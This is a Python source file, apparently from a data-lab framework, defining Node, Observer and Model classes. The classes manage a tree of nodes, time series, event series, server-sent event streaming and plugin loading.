myGlobalDir = os.path.dirname(os.path.realpath(__file__)) # holds the directory of this script
def getRandomId():
return '%08x' % random.randrange(16 ** 8)
#used as an OOP wrapper for the flat and procedural style of the model class
class Node():
""" used as an OOP wrapper for the flat and procedural style of the model class
it is a convenient way to access nodes and their hierarchy and internals
"""
def __init__(self,myModel,myId):
""" a node can be created by calling the
mynode = model.get_node("root.mynode") or
mynode = Node(mymodel,"123")
Returns:
a node object for further access to values, hierarchy etc.
"""
self.model = myModel # this is not a copy!!
self.id = myId
def __repr__(self):
return 'Node(id={:}, value={:})'.format(self.id, self.get_value())
def get_value(self):
""" Returns:
the "value" property of the node
None if node has no "value"
"""
return self.model.get_value(self.id)
#####################
# time series node API
def get_time_series(self, start=None,
end=None,
noBins=None,
includeIntervalLimits=False,
resampleTimes=None,
format="default",
toList = False,
resampleMethod = None):
"""
Returns
dict with {"__time": [...], "values": [...]}
"""
browsePath = self.model.get_browse_path(self.id)
data = self.model.time_series_get_table(variables = [browsePath],
tableDescriptor=None,
start=start,
end=end,
noBins=noBins,
includeIntervalLimits=includeIntervalLimits,
resampleTimes=resampleTimes,
format=format,
toList=toList,
resampleMethod=resampleMethod)
if data !={} :
return data[browsePath]
else:
return None
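# Shape of the result (illustrative): {"__time": [...epoch seconds...], "values": [...]},
# optionally resampled/binned according to the keyword arguments; None is returned if the
# underlying table lookup yields nothing for this node.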
def get_raw_time_series(self,start=None,end=None):
return self.model.time_series_get_raw(self.id,start=start,end=end)
def add_references(self,targetNodes,deleteAll=False):
"""
add references from the node to the targets
Args:
targetNodes: node or list of nodes to reference to
deleteAll: if set true, we delete all existing references before creating the new ones
Returns
True/False for success/error
"""
if deleteAll:
self.model.remove_forward_refs(self.id)#this deletes all existing
if type(targetNodes) is not list:
targetNodes = [targetNodes]
targetIds = [node.get_id() for node in targetNodes]
return self.model.add_forward_refs(self.id,targetIds)
def set_value(self,value):
"""
special support for "column" types: if a scalar is given, we make a "full" array
"""
if self.get_properties()["type"] == "column":
if type(value) != numpy.ndarray and type(value) != list:
#we have a scalar, so we set it
#get the len of the table
timeNode = self.get_table_time_node()
length = len(timeNode.get_value())
value = numpy.full(length,value,dtype=numpy.float64)
return self.model.set_value(self.id,value)
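# Example (illustrative): on a "column" node belonging to a table with 5 rows,
# node.set_value(0.0) stores numpy.full(5, 0.0, dtype=numpy.float64) -- the scalar is
# broadcast to the full table length before being written to the model.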
def set_time_series(self,values=None,times=None):
"""
replaces the time series with value and times, it deletes the existing
"""
return self.model.time_series_set(self.id,values=values,times=times)
def insert_time_series(self,values=None,times=None,allowDuplicates = False):
"""
insert data, if the time stamp exists already, we replace it
"""
return self.model.time_series_insert(self.id,values=values, times=times, allowDuplicates=allowDuplicates)
def merge_time_series(self,values=None, times=None):
""" merge the given values and times into the time series of this node"""
return self.model.time_series_merge(self.id,values = values,times=times)
def delete_time_series(self,start=None,end=None):
return self.model.time_series_delete_area(self.id, start=start, end=end)
#####################
# event series node API
def get_event_series(self, start=None, end=None, format="default",eventFilter = None):
return self.model.event_series_get(self.id,start=start,end=end,format=format,eventFilter=eventFilter)
def set_event_series(self, values=None, times=None):
"""
replaces the event series with value and times, it deletes the existing
"""
return self.model.event_series_set(self.id,values=values,times=times)
def insert_event_series(self,values=None,times=None,allowEventDuplicates = False):
return self.model.event_series_insert(self.id,values,times,allowEventDuplicates=allowEventDuplicates)
def delete_event_series(self,start=None, end = None, eventsToDelete=[]):
return self.model.event_series_delete(desc=self.id,start=start,end=end,eventsToDelete=eventsToDelete)
def get_parent(self):
""" Returns:
a Node()-instance of the parent of the current node,
None if no parent available
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
return self.model.get_node(nodeInfo["parent"])
else:
return None
def get_child(self,childName):
"""
Args:
childName (string): the name of the child node
Returns:
a Node() instance of the child holding the childName
None if the current node does not have a child with the name childName
"""
nodeInfo = self.model.get_node_info(self.id)
if nodeInfo:
for childId in nodeInfo['children']:
childInfo = self.model.get_node_info(childId)
if childInfo["name"] == childName:
return self.model.get_node(childId)
return None
def delete(self):
"""
delete this node from the model; note that the Node object itself is not destroyed, but it is disconnected from the model
and should not be used anymore afterwards
:return:
"""
return self.model.delete_node(self.id)
def create_child(self,name=None,type="folder",value=None,properties={}):
"""
create a node under the current node, if the node exists already, we get the node
Args:
name [string] the child name
type [string] the type of the node
value [any] direct assignment of values
properties [dict] a dict with further settings of properties like value, type etc
Returns:
the node object or None if not available
"""
if name == None:
name = '%08x' % random.randrange(16 ** 8)
id = self.model.create_node(parent=self.id,name=name,type=type,value=value,properties=properties)
if id:
return self.model.get_node(id)
else:
#we try to get it anyways
return self.get_child(name)
def get_children(self, deepLevel=1):
""" Returns:
a list of Node()-objects which are the children of the current node
args:
deepLevel: set >1 to get children and children's children
"""
nodeInfo = self.model.get_node_info(self.id)
children = []
if nodeInfo["children"]:
children=[self.model.get_node(id) for id in nodeInfo['children'] ]
while deepLevel>1:
deepLevel -=1
childrenOld = children.copy()
for child in childrenOld:
children.extend(child.get_children())
#remove duplicates via id:
childDict = {child.get_id():child for child in children} # same keys(id) will only be there once
children = list(childDict.values())
return children
def get_properties(self):
""" Returns:
a dictionary holding the properties of the node like {"value":123,"name":"myVariable","children":...}
"""
nodeInfo = self.model.get_node_info(self.id)
return copy.deepcopy(nodeInfo)
def get_type(self):
"""
Returns:
the type of the node
"""
return self.get_property("type")
def get_property(self,property):
"""
Args:
property: the property name asked for
Returns:
the value of the property behind the property given
None if the property does not exist
"""
nodeDict =self.get_properties()
if property in nodeDict:
return self.get_properties()[property]
else:
return None
def set_properties(self,properties):
"""
add or modify properties of a node
Args:
properties [dict] holding key,value for the properties
Returns
True for ok, False for not done
"""
return self.model.set_properties(properties,nodeDesc=self.id)
def get_model(self):
""" this function should only be used for testing, we should never need to access the underlying model directly
Returns:
the underlying model of type Model() class
"""
return self.model
def get_target_ids(self):
""" this function returns the target ids of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
return self.get_properties()["forwardRefs"]
def get_target(self):
""" this function returns the first direct target node of a referencer, not resolving the leaves"""
if self.get_properties()["type"] == "referencer":
targets = self.get_properties()["forwardRefs"]
if targets:
return Node(self.model,targets[0])
return None
def get_targets(self):
""" this function returns the target Nodes of a referencer as a list, not resolving the leaves"""
if self.get_properties()["type"] != "referencer":
return None
targets = []
for nodeid in self.get_properties()["forwardRefs"]:
targets.append(Node(self.model,nodeid))
return targets
def get_leaves(self):
""" this function returns a list of Nodes containing the leaves where this referencer points to
this function works only for nodes of type "referencer", as we are following the forward references
leaves are defined as follows:
1) all nodes that are listed under the forward references and which are not of type referencer or folder
2) if a node pointed to is a referencer, its targets are again analyzed
3) if a node pointed to is a folder, all children of the folder are taken which are not referencers or folders themselves
folders and referencers inside the folder are not taken into account
doing so, hierarchies of referencers are unlimited, hierarchies of folders are only of depth 1
(a typical call is shown in the usage sketch after this class)
Returns:
all nodes which are considered leaves as a list of Node() objects
"""
leaves = self.model.get_leaves(self.id) # a list of node dicts
leaveNodes = []
for leave in leaves:
leaveNodes.append(Node(self.model,leave["id"]))
return leaveNodes
def get_leaves_ids(self):
"""
get the list of ids of the leaves, see get_leaves()
Returns:
a list of ids of the leaves
"""
return self.model.get_leaves_ids(self.id)
def get_id(self):
""" Returns: the nodeid (which is generated by the system) """
return self.id
def get_browse_path(self):
""" Returns: the browsepath along the style "root.myfolder.myvariable..." """
return self.model.get_browse_path(self.id)
def get_name(self):
""" Returns: the name of the node without the path """
return self.model.get_node_info(self.id)["name"]
def get_node(self,desc):
return self.model.get_node(desc)
def get_table_time_node(self):
""" if the current node belongs to a table, then we can get the time node of that table
Returns:
(Node()) the time node of the table,
None if not found
"""
timeNode = self.model.find_table_time_node(self.id)
if timeNode:
return Node(self.model,timeNode)
else:
return None
def get_table_len(self):
"""
if the current node is a type "table", we get the current len
Return:
the len of the columns of the table
"""
return self.model.get_table_len(self.id)
def get_table_node(self):
"""
if the current node is a column of a time series table, we get the according table node of type "table"
Return:
a Node() of type "table" which is the table of the current node
"""
tableId = self.model.find_table_node(self.id)
if tableId:
return self.model.get_node(tableId)
else:
return None
def get_time_indices(self,startTime,endTime):
""" works only for the time node, it looks to find the timeField node of the table to which the node belongs
then tries to find start and end time inside the timeField column and returns the index (rownumber) which are
INSIDE the given startTime, endTime
Args:
startTime: the start time to look up; supported formats: epoch seconds, datetime object, iso string
endTime: the end time to look up; supported formats: epoch seconds, datetime object, iso string
Returns:
(numpy array) index numbers of the rows of the table that fall inside the given [startTime, endTime] interval
None if the table, the timeField or the start/end times could not be resolved
"""
try:
startTime = date2secs(startTime)
endTime = date2secs(endTime)
times = numpy.asarray(self.get_value())
indices = numpy.where((times >= startTime) & (times <= endTime))[0]
return indices
except:
return None
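# Example (illustrative): for a time node holding [10, 20, 30, 40] (epoch seconds),
# get_time_indices(15, 35) returns numpy.array([1, 2]) -- the row numbers whose
# timestamps fall inside the requested interval.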
def execute(self):
return self.model.execute_function(self.id)
def execute_synchronous(self):
return self.model.execute_synchronous(self.id)
def instantiate(self):
return self.model.instantiate_object(self.id)
def get_object(self):
return self.model.get_object(self.id)
def get_logger(self):
return self.model.logger
def connect_to_table(self,tableNode):
"""
connect a node to a table, it must be a column type
the node itself will be reset and filled with numpy.inf and prepared to work with the table:
an array will be created with np.inf of the current table size
and the column will be hooked to the table referencer
Returns:
True on success
"""
if self.get_property("type") != "column":
return False
#now make an array of np.inf of the current table size and apply the value
timeNode = tableNode.get_table_time_node()
if not timeNode:
return False
tableLen = len(timeNode.get_value())
self.set_value(numpy.full(tableLen,numpy.inf,dtype=numpy.float64))
#now hook it as column to the table
#check if we are part of it already
for column in tableNode.get_child("columns").get_leaves():
if column.get_id() == self.get_id():
return True
#now connect it to the table
return self.model.add_forward_refs(tableNode.get_child("columns").get_id(), [self.id],allowDuplicates=False)
def get_columns(self):
"""
get the columns nodes of a table without the time node
can be executed on the table node
Returns:
list of node objects which are the columns of the table without the time node
"""
if self.get_properties()["type"] != "table":
return None
nodes = self.get_child("columns").get_leaves()
timeNode = self.get_table_time_node()
return [node for node in nodes if node.get_id() != timeNode.get_id()]
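# Illustrative sketch (not part of the module): the Node class above is a thin OOP wrapper around
# a Model instance. The function below shows the typical access pattern described in the docstrings
# of get_child(), get_leaves() and get_value(): resolve a node by browse path, follow a referencer
# down to its leaves and read their values. All node names used here ("root.machine", "signals")
# are hypothetical.
def _node_usage_sketch(model):
    machine = model.get_node("root.machine")      # resolve by browse path, None if missing
    if not machine:
        return None
    signals = machine.get_child("signals")        # direct child by name
    if signals and signals.get_type() == "referencer":
        for leaf in signals.get_leaves():         # resolved per the get_leaves() rules
            print(leaf.get_browse_path(), leaf.get_value())
    return machine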
class Observer:
# The observer needs a reference to the model, because the rest service is not able to detect
# when the client connection is closed, but the observer message handling loop can detect it
# this way the observer can detach itself from the model, when the client is disconnected
# there are two queues involved: the updateQueue holding events pushed from the model
# and the eventQueues which hold the filtered updateQueue (filtering avoids sending multiple identical events in a short time)
def __init__(self, model):
self.model = model
# Message queues to store the new events and last time stamps
self.updateQueue = Queue()
self.eventQueues = {} # k,v = event:{"lasttimestamp":datetime,"queue":Queue()
self.minWaitTime = 0.500 #in seconds float
# use the logger of the model
self.logger = self.model.logger
self.lock = threading.RLock()
#preload queue: this is a workaround as the browser does not get the first 2 events immediately
# it actually doesn't help ..?
for i in range(2):
self.updateQueue.put({"event":"_preload","id":"","data":{"xy":str(i)}})
def update(self, event):
"""
inform the observer about the occurrence of an event
Args:
event (dict): the event to be queued, with the keys "event", "id" and "data"
"""
defaultEvent = {"data":"","id":"","event":""}
defaultEvent.update(event)
self.updateQueue.put(defaultEvent)
#self.logger.debug(f"Qup {id(self)} {defaultEvent['event']}, {defaultEvent['id']}")
def get_event(self):
"""
get the next event from the observer class, this is used as a generator for the webserver
we also filter out events to avoid a train of identical events
the filtering uses the self.minWaitTime, within that period we don't send identical events;
events are "identical" if they have the same "event" and "data"
"""
self.logger.debug(f"Observer {id(self)} get_event()")
stop_event_processing = False # This flag shows when to stop the event processing
while not stop_event_processing:
try:
# Try to retrieve an item from the update queue
event = self.updateQueue.get(block=True,timeout=self.minWaitTime)
#self.logger.debug(f"event pick {event}")
#create an eventIdentification, this is used to filter out repeated events
# we build the eventIdentification in a way that events which carry unique information are kept
# we take all information from the event.data field, so only the events WITHOUT unique data will be removed
# those are typically the tree.update events
eventIdentification = event["event"] #the event name itself
for key in event["data"]:
eventIdentification = eventIdentification+str(key)+str(event["data"][key])
#now sort this event into the queues of eventids
if eventIdentification not in self.eventQueues:
# this is a new type/identification of event, create an entry in the event queue
# put the event in the queue and make the last timestamp so that we send it out now
self.eventQueues[eventIdentification]={"lastTimeStamp":0,"queue":Queue()}
self.eventQueues[eventIdentification]["queue"].put(event)
except Exception as ex:
# this happens if we time out the queue get, no problem, just continue
#self.logger.error(f"Exception observer {id(self)} thread self.updateQueue.get: {ex},{str(sys.exc_info()[0])}")
pass
#now go over all the sorted event queues and check what to send out:
if 0:
#show the queues
for k,v in self.eventQueues.items():
q = v["queue"]
qLen = q.qsize()
#self.logger.debug(f"Queue {k}: len {qLen} {[q.queue[id] for id in range(qLen)]}")
try:
now = time.time()
for eventIdentification,entry in self.eventQueues.items(): # entry is {"lasttimestampe": "queue":
#self.logger.debug(f"observer {id(self)} check queue of {eventIdentification} size: {entry['queue'].qsize()},last:{entry['lastTimeStamp']}, now:{now}, ready: {now > (entry['lastTimeStamp']+self.minWaitTime)}")
if (not entry["queue"].empty()) and (now > (entry["lastTimeStamp"]+self.minWaitTime)):
#send this event, the timeout was met, we pull the first event from the queue, trash the remaining ones
"""
old code
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
myEvent = self.eventQueues[eventIdentification]["queue"].get()
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {myEvent["data"]}\n\n'
self.logger.debug(f'Observer {id(self)} sending event: {event_string}')
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
self.eventQueues[eventIdentification]["queue"].get(False)
self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
"""
self.eventQueues[eventIdentification]["lastTimeStamp"]=now
#send out this event
#pull empty the queue
if self.eventQueues[eventIdentification]['queue'].qsize():
#self.logger.debug(f"Qtrash observerinstance{id(self)} eventident {eventIdentification} size {self.eventQueues[eventIdentification]['queue'].qsize()}")
while not self.eventQueues[eventIdentification]["queue"].empty():
myEvent = self.eventQueues[eventIdentification]["queue"].get(False)
event_string = f'id:{myEvent["id"]}\nevent: {myEvent["event"]}\ndata: {json.dumps(myEvent["data"])}\n\n'
#self.logger.debug(f"Qyield {id(self)} : {myEvent}")
yield event_string
# This exception is raised when the generator function is exited, which means that the
# client side connection to the SSE stream was closed, thus the observer can be removed
except GeneratorExit:
self.logger.warning(f"Observer {id(self)} connection closed.")
stop_event_processing = True
self.logger.warning(f"Observer {id(self)} exiting event processing.")
# Detach this observer from the model
self.model.detach_observer(self)
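# Illustrative sketch (not part of the module): get_event() above deduplicates repeated events
# within minWaitTime by grouping them under an "event identification" built from the event name
# plus every key/value pair of the data field, so only events WITHOUT distinguishing data get
# collapsed. The helper below (hypothetical name) restates that grouping rule.
def _event_identification(event):
    ident = event["event"]
    for key in event["data"]:
        ident = ident + str(key) + str(event["data"][key])
    return ident
# _event_identification({"event": "tree.update", "id": "", "data": {}}) -> "tree.update"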
class Model:
nodeTemplate = {"id": None, "name": None, "type": "folder", "parent": None, "children": [], "backRefs": [],"forwardRefs":[],"value":None}
def __init__(self):
"""
initialize an empty Model object, it will contain the root Node as folder with Id "0"
during the initialization, also the plug-ins (all files in the ./plugin) are loaded:
all templates and functions are imported
a model holds all modelling information and data to work on
"""
self.version = 0.1
self.model = {"1":{
"name":"root",
"type":"folder",
"children":[],
"parent":"0",
"id":"1",
"backRefs":[],
"forwardRefs":[],
"version":self.version
}}
self.disableObserverCounter = 0 # a counting semaphore (under manual lock) for disabling notifications: if zero, notify_observers is active, otherwise not
self.__init_logger(logging.DEBUG)
self.globalIdCounter=1 # increased on every creation of a node, it holds the last inserted node id
self.idCreationHash = True # if this is true, we create the id as a random value, not per counter
self.ts = TimeSeriesTable()
self.functions={} # a dictionary holding all functions from ./plugins
self.templates={} # holding all templates from ./plugins
self.lock = threading.RLock()
self.executeFunctionRunning = False # set to true, makes sure only one functions runs at a time
self.objectClasses = {} # a dictionary holding all object classes from the ./plugins
self.import_default_plugins()
self.differentialHandles ={} # containing model_copy entries to support differential queries
self.diffHandleCounter = 0 # used only for debugging
self.differentialHandlesMaxPerUser = 10
self.currentModelName = "emptyModel" # the current name of the model
self.modelUpdateCounter = 0 #this is for the tree observer, on any change, we update the counter
self.observerStatus = {} # a dict holding the key = observerid and value : the needed status of an observer processing
self.executionQueue = Queue()
self.observers = []
self.sse_event_id = 1
self.start_function_execution_thread()
def __del__(self):
self.functionExecutionRunning = False # stop the execution thread of functions
def __init_logger(self, level):
"""setup the logger object"""
self.logger = logging.getLogger("Model-"+'%08x' % random.randrange(16 ** 8))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
logfile = logging.FileHandler("./log/model.log")
logfile.setFormatter(formatter)
self.logger.addHandler(logfile)
self.logger.setLevel(level)
def __get_id(self, id):
"""
Args:
id (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
or a "fancy" path mixed like "1000.min" where 1000 is a node id; only the first element may be a node id, the following ones are names
Returns:
(string): the node id as string
None if not found
"""
if id in self.model:
return id
#maybe a browsepath?
try:
names = id.split('.')
if names[0]=="root":
names = names[1:]
actualSearchId = "1"
elif names[0] in self.model:
#self.logger.debug(f"fancy browsepath {names}")
actualSearchId = names[0]
names = names[1:]
else:
return None
except:
return None
#now we start at root
for name in names:
nextSearchId = None
for childId in self.model[actualSearchId]["children"]:
if self.model[childId]["name"] == name:
#this is a match
nextSearchId = childId
break
if not nextSearchId:
return None
#we found it, go deeper now
actualSearchId = nextSearchId
return actualSearchId
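# Examples of descriptors accepted by __get_id (illustrative, ids are hypothetical):
#   __get_id("1")                   -> "1"                  (already a node id)
#   __get_id("root.myfolder.myvar") -> the id of myvar      (resolved via the children lists)
#   __get_id("1000.min")            -> id of the child named "min" under node id 1000 ("fancy" path)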
def get_node(self,desc):
""" instantiate a Node() object on the node given as desc
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if id:
return Node(self,id)
def find_node(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return the first match
whose browse path contains the search string and whose properties match all key/value pairs given in matchProperty
"""
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
if any(k not in self.model[id] or self.model[id][k] != v for k, v in matchProperty.items()):
continue # at least one required property is missing or has a different value
return Node(self,id)
return None
def find_nodes(self,search,matchProperty={}):
"""
the search is a match pattern for the path, we return all matches as nodes whose properties match all key/value pairs given in matchProperty
"""
found = []
with self.lock:
for id in self.model:
if search in self.get_browse_path(id):
if matchProperty!={}:
if any(k not in self.model[id] or self.model[id][k] != v for k, v in matchProperty.items()):
continue # skip nodes that do not match all required properties
found.append(Node(self,id))
return found
def get_node_info(self,desc,includeLongValues=True):
"""
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
includeLongValues: if true, we include the values for columns, files and timeseries
Returns:
(dict): a dictionary holding all properties of the node including references and children
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
#values of columns, files and timeseries are only included if includeLongValues is set
if self.model[id]["type"] in ["column","file","timeseries"]:
if includeLongValues:
return copy.deepcopy(self.model[id])
else:
return {k:v for k,v in self.model[id].items() if k!="value"}
elif self.model[id]["type"]== "object":
return {k: v for k, v in self.model[id].items() if k != "object"} # don't take the "object" key
else:
#take all
return copy.deepcopy(self.model[id])
def __get_node_with_children(self,id,nodes,includeForwardRefs=True):
"""
recursive helper for get_branch
"""
if self.model[id]["type"] in ["file","column","timeseries"]:
#we do not take these values
nodes[id]={k:v for k,v in self.model[id].items() if k!="value"} # copy the whole but leave out the value
elif self.model[id]["type"] == "referencer":
nodes[id] = self.model[id]
if includeForwardRefs:
#for referencers, we take the direct targets
for targetId in self.model[id]["forwardRefs"]:
if self.model[targetId]["type"] in ["file", "column","timeseries"]:
# we do not take these values
target = {k: v for k, v in self.model[targetId].items() if k != "value"} # copy the whole but leave out the value
else:
target = copy.deepcopy(self.model[targetId])
#xxx todo, we might take the wrong backrefs with us, also these target nodes might not have their parent here
nodes[targetId]=target
else:
nodes[id]=self.model[id]
for child in self.model[id]["children"]:
nodes.update(self.__get_node_with_children(child,nodes,includeForwardRefs))
return nodes
def get_branch(self,desc,includeRoot=True,includeForwardRefs=True):
"""
get a branch of the model starting from desc including all children excluding:
columns
files
for referencers, we do not follow deep search for leaves, we just include the first level referenced nodes
referencers pointing to nodes that are not part of the branch will also be included
Returns:
a list of nodedicts that can be used as a full valid model again
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
nodes = {}
nodes.update(self.__get_node_with_children(id,nodes,includeForwardRefs))
#now we also need all nodes to the desc
if includeRoot:
while self.model[id]["parent"]!="0":
#the parent is valid, so take it; we don't make further checks for files and others
parentId = self.model[id]["parent"]
parentNode = copy.deepcopy(self.model[parentId])
parentNode["children"]=[id] # the other side-children are not of interest
nodes.update({parentId:parentNode})
id = self.model[id]["parent"]
return copy.deepcopy(nodes)
def __get_node_with_children_pretty(self,id,depth = None,ignore = []):
"""
recursive helper for get_branch_pretty
Args:
depth: the remaining depth to descend into, None for unlimited
ignore: list of names; children whose browse path contains any of them are skipped
"""
#t=utils.Profiling(f"id {self.get_browse_path(id)}, ignore = {ignore}")
result = {}
node = self.model[id]
#create my properties
props = {k: copy.deepcopy(v) for k, v in node.items() if k not in ["value", "backRefs", "children"]}
if node["type"] not in ["file", "column","timeseries"]:
# we also take the value then
props["value"] = copy.deepcopy(node["value"])
if node["type"] == "referencer" and (depth is None or depth>0):
#tt = utils.Profiling("get leaves")
leaves = self.get_leaves_ids(id)
#print(tt)
#tt.start("get leaves data")
forwards = [self.get_browse_path(leaf) for leaf in leaves]
props["leaves"]=forwards
#tt.lap("1")
props["targets"] = [self.get_browse_path(id) for id in self.model[id]["forwardRefs"]]
props["leavesIds"]=leaves
props["leavesValues"] = [self.get_value(id) if self.model[id]["type"] not in ["file","column","timeseries"] else None for id in leaves]
#tt.lap("2")
validation = []
props["leavesProperties"]={}
for id in leaves:
prop = self.get_node_info(id,includeLongValues=False)
if "validation" in prop:
validation.append(prop["validation"])
else:
validation.append(None)
props["leavesProperties"][id]=prop
props["leavesProperties"][id]["browsePath"]=self.get_browse_path(id)
#tt.lap("3")
props["leavesValidation"] = validation
#print(tt)
#make sure we have the browsepath on board
if "browsePath" not in props:
props["browsePath"]=self.get_browse_path(id)
result[".properties"]=props
if depth is None or depth>0:
#now the children
nextDepth = None
if depth is not None:
nextDepth = depth -1
for childId in node["children"]:
childPath = self.get_browse_path(childId)
if any([ignoreName in childPath for ignoreName in ignore]):
#self.logger.debug(f"ignore {childPath}")
pass
else:
result[self.model[childId]["name"]]=self.__get_node_with_children_pretty(childId,nextDepth,ignore)
#print(t)
return result
def get_branch_pretty(self,desc,depth=None,ignore = []):
"""
get a branch in the form
{"child1": {"child3": {...}, ".properties": {...}},
"child2": {".properties": {...}}}
the properties occur under the ".properties" entry, the children are direct entries
we only use names
for referencers, the "leaves" entry holds the resolved leaves with full path: ["root.folder1.target2", "root.variable.bare", ...]
Args:
desc [string] the root node to start from
depth [int] the depth to look into
ignore [list] names; children whose browse path contains any of them are skipped
"""
with self.lock:
#p=utils.Profiling("get_branch_pretty")
id = self.__get_id(desc)
if not id: return None
res = self.__get_node_with_children_pretty(id,depth,ignore)
#self.logger.debug(p)
return res
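# Shape of the result returned by get_branch_pretty (illustrative):
#   {".properties": {"id": ..., "name": ..., "type": ..., "browsePath": ..., ...},
#    "child1": {".properties": {...}, "grandchild": {...}},
#    "child2": {".properties": {...}}}
# referencer nodes additionally carry "leaves", "targets", "leavesIds", "leavesValues",
# "leavesProperties" and "leavesValidation" inside their ".properties" entry.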
def get_node_with_children(self,desc):
""" retrieve node information including children of the first level
Args:
desc (string): give a browsepath ("root.myfolder.myvariable") or a nodeId ("10")
Returns:
(Node()): a node object of the given node including the browsepath
None if not found
"""
with self.lock:
id = self.__get_id(desc)
if not id: return None
response = copy.deepcopy(self.model[id])
response["browsePath"]=self.get_browse_path(id)
if response["children"]!=[]:
children =[]
for childId in response["children"]:
childInfo = copy.deepcopy(self.model[childId])
childInfo["browsePath"]=self.get_browse_path(childId)
children.append(childInfo)
response["children"]=children
return response
def get_models(self):
"""
get the available model files from the disk under /models
Returns: a list of strings
"""
try:
mydir = myGlobalDir
os.chdir(mydir) # to enable import easily
files = os.listdir(mydir + '/models')
# take only the ones with '.json', but cut the '.model.json' extension
models = [f.split('.model')[0] for f in files if f.endswith(".json")]
return models
except Exception as ex:
self.logger.error("Model.get_models() failed "+str(ex))
return []
def get_info(self):
"""
get some information about the model
Returns: (dict) key value pairs on information of the model,
"""
return {"name":self.currentModelName}
def import_plugins_from_directory(self, plugin_directory: str, check_file_marker = True):
""" find all plugins from plugin_directory.
take from there the templates from the files and the functions
Args:
check_file_marker: if set to True, we expect a "#21datalabplugin" string in the first line
"""
if plugin_directory not in sys.path:
sys.path.append(plugin_directory) # for the importlib to find the stuff
plugin_filenames = glob.glob(os.path.join(plugin_directory, '**/*.py'), recursive=True)
for fileName in plugin_filenames:
if os.path.basename(fileName).startswith('__'):
continue # avoid __pycache__ / __init__ files (fileName is a full path, so check the basename)
#we need to check if extra plugins have the "#21datalabplugin" marker in their first line
if check_file_marker:
absolutePath = os.path.join(myGlobalDir,fileName)
f = open(absolutePath,"r")
firstLine = f.readline()
f.close()
if firstLine != "#21datalabplugin\n":
continue
filename_relative = os.path.relpath(fileName, plugin_directory)
moduleName = os.path.splitext(filename_relative)[0].replace(os.path.sep, '.')
self.logger.info(f"import plugin lib {moduleName}")
module = importlib.import_module(moduleName)
module = importlib.reload(module) # if we change an already imported, python uses the cache, so to make sure we always get the latest, reimport here
#now analyze all objects in the module
for objName in dir(module):
if objName.startswith('__'):
continue # these are python generated info objects, we don't want them
element = getattr(module,objName)
if type(element) is dict:
#this is a template information
self.templates[moduleName+"."+objName]=copy.deepcopy(element)
elif (inspect.isclass(element)):
newClass = {"module":module,"class":element}
self.objectClasses[moduleName + "." + objName] = newClass
elif callable(element):
#this is a function, get more info
newFunction = {"module":module, "function":element}
self.functions[moduleName+"."+objName]=newFunction
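# Minimal plugin sketch (illustrative): a file dropped into ./plugins could contain
#   myTemplate = {"name": "demo", "type": "folder", "children": []}   -> collected into self.templates
#   class MyClass: ...                                                -> collected into self.objectClasses
#   def myFunction(functionNode): ...                                 -> collected into self.functions
# plugins imported from extra directories additionally need "#21datalabplugin" as their first line.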
def import_default_plugins(self):
""" find all plugins (= all .py files in the ./plugin folder
take from there the templates from the files and the functions
don't check them for #21datalabplugin marker
this function is execution on startup of the model
"""
self.import_plugins_from_directory(os.path.join(myGlobalDir, 'plugins'),check_file_marker=False)
def get_id(self,ids):
""" convert a descriptor or a list of descriptors into ids (which can be used as entries to the model dictionary)
Args:
ids (string, list(string)): a single string or a list of strings, each either an id ("101") or a browsepath ("root.myfolder.myvar")
Returns:
a list(id) or id as string
"""
with self.lock:
if type(ids) == type(list()):
newList = []
for id in ids:
newList.append(self.__get_id(id))
return newList
elif type(ids) == type(dict()):
newDict = {}
for oldId in ids:
id = self.__get_id(oldId)
newDict[id]=ids[oldId] #also copy the value
return newDict
else:
#assume its scalar
return self.__get_id(ids)
def get_browse_path(self,desc):
"""
Args:
desc(string): a node id or browsepatch
Returns:
(string) a browsepath
"""
with self.lock:
id = self.get_id(desc)
if not id in self.model:
return None
path = self.model[id]["name"]
while 1:
id = self.model[id]["parent"]
if id =="0":
break
else:
path = self.model[id]["name"]+"."+path
return path
def push_nodes(self,nodeDicts):
"""
push a ready nodedict into the model
this is a dangerous function as it does not adjust references, parent/child relations whatsoever
you must take care of that yourself
"""
for nodeDict in nodeDicts:
self.logger.warning(f"pushing node {nodeDict['id'], nodeDict['name']}")
self.model[nodeDict["id"]]=copy.deepcopy(nodeDict)
self.__notify_observers([],None) # just trigger the treeupdate for now
#xxx todo notify!
def create_node(self,parent="root",type="folder",value=None,name="newNode",properties={}):
"""
create a node inside the model by giving several infos
Args:
parent: a descriptor (browsepath or id) of the parent
type: the type of the node
value: (optional) give a value for the node
name(string): a name of the node, must be unique under the parent
properties (dict): a dictionary containing further key-values to be placed into the node as properties
Returns:
(string) nodeid,
None for problem during creation
"""
#check if parent exists
with self.lock:
parentId = self.get_id(parent)
if not parentId:
return None
#check if the same name exists already
newpath = self.get_browse_path(parent)+"."+name
if self.get_id(newpath):
#we found it, it exists already, so we can't create it
return None
# we can create this node
if self.idCreationHash == True:
newId = str((random.randrange(2**64))) # a 64 bit random value
else:
self.globalIdCounter += 1
newId = str(self.globalIdCounter)
newNode = copy.deepcopy(self.nodeTemplate)
newNode.update({"id":newId,"name":name,"type":type,"parent":parentId})
if properties !={}:
newNode.update(properties)
if value != None:
newNode["value"]=value
self.model[parentId]["children"].append(newId)
self.model[newId] = newNode
if newNode["type"] == "timeseries":
self.time_series_create(newId)
if newNode["type"] == "eventseries":
self.event_series_create(newId)
